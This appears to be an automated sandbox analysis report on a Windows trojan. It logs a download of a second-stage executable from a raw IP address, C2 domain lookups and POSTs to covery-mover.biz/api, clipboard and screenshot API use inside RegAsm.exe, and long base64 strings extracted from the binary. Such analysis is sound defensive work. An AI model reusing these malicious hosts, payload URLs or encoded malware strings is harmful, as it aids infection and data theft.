00 00 00 00 04 00 00 00 00 20 05 00 00 02 00 00 00 52 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 78 39 00 00 00 30 05 00 00 3a 00 00 00 54 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Source: global trafficHTTP traffic detected: GET /infopage/ung0.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131Connection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 147.45.44.131 147.45.44.131
        Source: Joe Sandbox ViewASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
        Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 172.67.206.64:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 172.67.206.64:443
        Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49704 -> 147.45.44.131:80
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: covery-mover.biz
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: global trafficHTTP traffic detected: GET /infopage/ung0.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131Connection: Keep-Alive
        Source: global trafficDNS traffic detected: DNS query: zinc-sneark.biz
        Source: global trafficDNS traffic detected: DNS query: se-blurry.biz
        Source: global trafficDNS traffic detected: DNS query: dwell-exclaim.biz
        Source: global trafficDNS traffic detected: DNS query: formy-spill.biz
        Source: global trafficDNS traffic detected: DNS query: covery-mover.biz
        Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: covery-mover.biz
        Source: htZgRRla8S.exe, 00000000.00000002.2139643170.000000000309B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131
        Source: htZgRRla8S.exe, 00000000.00000002.2139643170.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/ung0.exe
        Source: htZgRRla8S.exe, 00000000.00000002.2139643170.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/ung0.exeP
        Source: htZgRRla8S.exe, 00000000.00000002.2139643170.000000000309B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: RegAsm.exe, 00000005.00000002.2179755073.0000000000E1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covery-mover.biz/
        Source: RegAsm.exe, 00000005.00000002.2179755073.0000000000E1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covery-mover.biz/2
        Source: RegAsm.exe, 00000005.00000002.2179755073.0000000000E1A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2179542666.0000000000D8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covery-mover.biz/api
        Source: RegAsm.exe, 00000005.00000002.2179542666.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2179542666.0000000000DAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covery-mover.biz/apiQ
        Source: RegAsm.exe, 00000005.00000002.2179755073.0000000000E1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covery-mover.biz/apin
        Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
        Source: unknownHTTPS traffic detected: 172.67.206.64:443 -> 192.168.2.5:49705 version: TLS 1.2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00431A30 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,5_2_00431A30
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00431A30 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,5_2_00431A30
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00431BB0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,5_2_00431BB0

        System Summary

        barindex
        .NET source code contains very large strings
        Source: htZgRRla8S.exe, Sap.csLong String: Length: 18812
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040A9605_2_0040A960
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004087F05_2_004087F0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00436F905_2_00436F90
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00425F7D5_2_00425F7D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004090705_2_00409070
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0043A0305_2_0043A030
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004038C05_2_004038C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004380D95_2_004380D9
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041D8E05_2_0041D8E0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0042D0855_2_0042D085
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004280B05_2_004280B0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004261705_2_00426170
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0042297F5_2_0042297F
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0042A1005_2_0042A100
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004379005_2_00437900
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00416E975_2_00416E97
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004059105_2_00405910
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004259205_2_00425920
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004301D05_2_004301D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004081F05_2_004081F0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004089905_2_00408990
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004171905_2_00417190
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00414A405_2_00414A40
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041BA485_2_0041BA48
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040CA545_2_0040CA54
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004042705_2_00404270
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004222705_2_00422270
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004062005_2_00406200
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00423A005_2_00423A00
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0043CAC05_2_0043CAC0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0043E2C05_2_0043E2C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004292D05_2_004292D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00415ADC5_2_00415ADC
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0042BA8D5_2_0042BA8D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040E2A95_2_0040E2A9
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004192BA5_2_004192BA
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040B3515_2_0040B351
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041CB5A5_2_0041CB5A
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004093605_2_00409360
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041C3605_2_0041C360
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00416B7E5_2_00416B7E
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00411B1B5_2_00411B1B
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0043533A5_2_0043533A
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0043CBD65_2_0043CBD6
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0043A3F05_2_0043A3F0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00439B905_2_00439B90
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00404BA05_2_00404BA0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004233A05_2_004233A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00436C405_2_00436C40
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040D44C5_2_0040D44C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00434C4D5_2_00434C4D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004074705_2_00407470
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00419C105_2_00419C10
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00418C1E5_2_00418C1E
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041D4205_2_0041D420
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041DC205_2_0041DC20
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004364305_2_00436430
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0043CCE05_2_0043CCE0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0043DCF05_2_0043DCF0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00422CF85_2_00422CF8
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00427C9D5_2_00427C9D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0043CD605_2_0043CD60
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004165715_2_00416571
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00424D705_2_00424D70
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00423D305_2_00423D30
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004215F05_2_004215F0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041DE405_2_0041DE40
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00423E4B5_2_00423E4B
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00405E605_2_00405E60
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004126705_2_00412670
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004256705_2_00425670
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041AE005_2_0041AE00
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0043CE005_2_0043CE00
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00423E305_2_00423E30
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004156D05_2_004156D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0042C6D75_2_0042C6D7
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00415EE05_2_00415EE0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004266E75_2_004266E7
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004066905_2_00406690
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0043E6905_2_0043E690
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004366905_2_00436690
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00416E975_2_00416E97
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00402EA05_2_00402EA0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004376B05_2_004376B0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00426EBE5_2_00426EBE
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00428F5D5_2_00428F5D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0042B7635_2_0042B763
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00425F7D5_2_00425F7D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00414F085_2_00414F08
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004207175_2_00420717
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004187315_2_00418731
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041EF305_2_0041EF30
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0042BFD35_2_0042BFD3
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00410FD65_2_00410FD6
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0042BFDA5_2_0042BFDA
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004167A55_2_004167A5
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00418FAD5_2_00418FAD
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004097B05_2_004097B0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0043DFB05_2_0043DFB0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00414A30 appears 76 times
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00408000 appears 52 times
        Source: htZgRRla8S.exe, 00000000.00000002.2139187988.000000000142E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs htZgRRla8S.exe
        Source: htZgRRla8S.exe, 00000000.00000000.2107648792.0000000000CFE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameUpdateManager.exeL vs htZgRRla8S.exe
        Source: htZgRRla8S.exe, 00000000.00000002.2140400522.0000000005570000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameqiobmurj.dll4 vs htZgRRla8S.exe
        Source: htZgRRla8S.exe, 00000000.00000002.2139643170.00000000030D4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameqiobmurj.dll4 vs htZgRRla8S.exe
        Source: htZgRRla8S.exeBinary or memory string: OriginalFilenameUpdateManager.exeL vs htZgRRla8S.exe
        Source: htZgRRla8S.exe, Pls.csBase64 encoded string: 'QzpcXFdpbmRvd3NcXE1pY3Jvc29mdC5ORVRcXEZyYW1ld29ya1xcdjQuMC4zMDMxOVxcUmVnQXNtLmV4ZQ=='
        Source: htZgRRla8S.exe, Sap.csBase64 encoded string: 'RjBVY2FBVVdNVThSRmxNWVBXODhGMFVMREZGVlZSdEZGbE1QVEhJY1p3VllEVVVXQzFVR1BXODhGMFVMREZGVlZSdEZGbE1QVEdRQWFCWmZEMU5NSzFnQll4QlpFbVVIRUVBY1pRZEZXVHRvYnp3RmN3QmFDMVZDQVZvVWRSRVdKMWdGQzFnUVl4QkZiendaYnp4VkprSVdRVVFIQlY4YWFFSjFEVmdVQjBRR2J3MVlMMU1XQ2xrUmRXODhRaFpDUWtZQVpBNWZBUllSRmxjQmJ3RVdLMWdXVXdCVlJRMVlGRk1RRm1JYVR3eENVd0JLQUU4Qll6bHJRa0FERGtNUUtrSmZERUpDRVVJVWRCWi9ERklIR2g5NERFSVdRaFlaYnp4VkprSVdRaFpDUWtRUWNoZEVEQllnQzBJMmFReEFCMFFXQjBSYlVnMS9ERUpUVkI0RFp3NURCeHBDRVVJVWRCWi9ERklIR2g5T0MyZ1dRaFpDSHp0L0MyZ1dRaFpDRWtNWGFndFZRa1VXQTBJY1pVSi9ERUpSVUJZMmFReEFCMFFXTmxrOGFCWUZVQjRBRzBJUVhUOFdGRmNPRjFOWkpndFlGaFlSRmxjSGNpdFlCbE1hU3p0L0prSVdRazF2YUJaVkprSVdRaFpDRUZNQmN4QllRblFMRm5VYWFCUlRFRUlIRUJnaGFTdFlGZ1ZRU2tBVWFoZFRUaFlSRmxjSGNpdFlCbE1hU3cxNERFSVdRaFlmYnp4NERFSVdRaFlTRjFRWmJ3RVdFVUlERmw4V0pnQlBGbE01UHhZMmFReEFCMFFXTmxrM2Z4WlRFUjRMREVKVmNBTmFGMU5MYnp4VkprSVdHVHRvUWhaVkprSVdRaFlRQjBJQWRBd1dJRjhXSVZrYmNBZEVGbE1RVEhFUWNpQlBGbE1SU2tBVWFoZFRTdzF2YUJaVkprSkxienhDUWhaVkpRZFlCa1FIQlY4YWFHODhienhDUWhaVkpSQlRCVjhOREJZMGRndDRBMXNIRVR0L0prSVdRa1lYQUZvY1pVSkZGbGNXQzFWVmRSWkVDMWdGT1d0VlFRZENJMFlMTEZjWVl4RWVTenRvUWhaVkpoazdhQlpDUWhaVkprSVdFRk1XRjBRYkpneFRGUllSRmtRY2FBVnRQenRvUWhaVkprSVdRaFlaYnp4VkprSVdRaFpDUWhaVkprSVVDVk1RREZNWk5WQVVUanRvUWhaVkprSVdRaFpDUWhaVkpBeENCbG9PUUJwNERFSVdRaFpDUWhaVkprSVdRaFF3QjBVQWF3ZGlDa1FIQTFKWEttODhRaFpDUWhaVkprSVdRaFpDUUdFYWNWUUNNVk1XTmw0SFl3TlNJVmtNRmxNTmNrQWFienhDUWhaVkprSVdRaFpDUWhaWFZRZENObDRRQjFjUlJRMVlGbE1hRmhSWkMyZ1dRaFpDUWhaVkprSVdRaFpBTlZrQ01GWnhCMEkyQ2tRUVp3WjFEVmdXQjA0QkpFNDdhQlpDUWhaVkprSVdRaFpDUWhReVl4WmlDa1FIQTFJMmFReENCMDRXUUJwNERFSVdRaFpDUWhaVkprSVdRaFEwQzBRQmN3TmFJMW9PRFZVd2ZrQWFienhDUWhaVkprSVdRaFpDUWhaWFVSQmZGbE15RUZrV1l4RkZMMU1QRFVRTUpFNDdhQlpDUWhaVkprSVdRaFpDUWhRbll3TlNNa1FOQVZNR2RTOVREMWtRR3hSWkMyZ1dRaFpDUWhaVkprSVdRaFpBT0VFZ2FBOVhFbUFMQjBFNllERlRBVUlMRFZoWEttODhRaFpDUWhaVkprSVdRaFpDUUhVSFl3TkNCMllRRFZVUWRSRjNRRHRvUWhaVkprSVdRaFlmV1R0L0prSVdRa3R2YUJaVkprSVZCMWdHRUZNU2J3MVlienh2YUJaVkprSVZFRk1GQzFrYkppTkdDM0lIRGxNU1p4WlRFVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbVFIRVVNWVl6WmVFRk1EQm5JUWFnZFJBMElIU244YmNqSkNFQllLQTFnUmFnY2ZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFl4QjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdNVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFlsQjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdKVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbUFMRUVJQVp3NTNEbG9OQVhNTlFnZGFCMUVERmxOZFR3eENNa0lRUWw0VWFBWmFCeHBDQzFnQkpnTlNCa1FIRVVWWkpndFlGaFlPQjFnU2Nnb2FRbDhNRmhZQmZ4SlRUaFlMREVKVmRoQlpGbE1CRmg5T0MyZ1dRaFpDRWtRY2NBTkNCeFlHQjFvUVlRTkNCeFlBRFZrWkpqVkVDMElITDFNWWFSQlBKbE1PQjFFVWNnY2VLMWdXTWtJSEp
        Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@8/7@5/2
